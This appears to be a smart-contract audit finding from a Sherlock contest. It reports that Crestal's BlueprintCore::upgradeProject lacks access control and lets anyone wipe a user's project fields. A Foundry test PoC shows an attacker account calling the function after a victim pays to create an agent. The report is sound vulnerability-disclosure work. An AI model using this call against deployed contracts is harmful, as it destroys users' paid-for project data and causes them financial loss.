Best Plastic Yak

High

# Attacker can delete user projects information

### Summary

Anyone can call the [BlueprintCore::upgradeProject](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L198) function. This means that information will be lost impacting functionality.

### Root Cause

In [BlueprintCore::198](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L198) The function to reset 3 of the projects values is a public function with no authorization checks.

### Internal Pre-conditions

1. Users have a project with a `requestProposalID`, `requestDeploymentID` or `proposedSolverAddr` set.  

### External Pre-conditions

None

### Attack Path

1. Malicious user calls the [BlueprintCore::upgradeProject](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L198) function passing the desired `projectId`

### Impact

The users sees their projects `requestProposalID`, `requestDeploymentID` and `proposedSolverAddr` deleted. If to generate these values the user payed, for example through the function `createAgentWithToken` this means there is a loss funds for that particular user as they now have to pay to create an agent again.

### PoC

```solidity
function test_resetInfo() public {
        address attacker = makeAddr("attacker");
        string memory base64Proposal = "test base64 proposal";
        string memory serverURL = "http://example.com";
        projectId = bytes32(0x2723a34e38d0f0aa09ce626f00aa23c0464b52c75516cf3203cc4c9afeaf2981);

        // Add the payment address
        blueprint.addPaymentAddress(address(mockToken));

        // Mint tokens to the test account
        uint256 validTokenAmount = 100 * 10 ** 18;

        // set none zero cost for create agents, use any number greater than 0
        blueprint.setCreateAgentTokenCost(address(mockToken), validTokenAmount);

        mockToken.mint(address(this), validTokenAmount);

        // Verify the mint
        uint256 balance = mockToken.balanceOf(address(this));
        assertEq(balance, validTokenAmount, "sender does not have the correct token balance");

        // check LogApproveEvent
        vm.expectEmit(true, true, false, true);
        emit MockERC20.LogApproval(address(this), address(blueprint), validTokenAmount);

        // Approve the blueprint contract to spend tokens directly from the test contract
        mockToken.approve(address(blueprint), validTokenAmount);

        // check allowance after approve
        uint256 allowance = mockToken.allowance(address(this), address(blueprint));
        assertEq(allowance, validTokenAmount, "sender does not have the correct token allowance");

        // Create agent
        blueprint.createAgentWithToken(projectId, base64Proposal, workerAddress, serverURL, address(mockToken));
        balance = mockToken.balanceOf(address(this));
        assertEq(balance, 0);
        
        // Attacker deletes values 
        vm.prank(attacker);
        blueprint.upgradeProject(projectId);
    }

```

### Mitigation

_No response_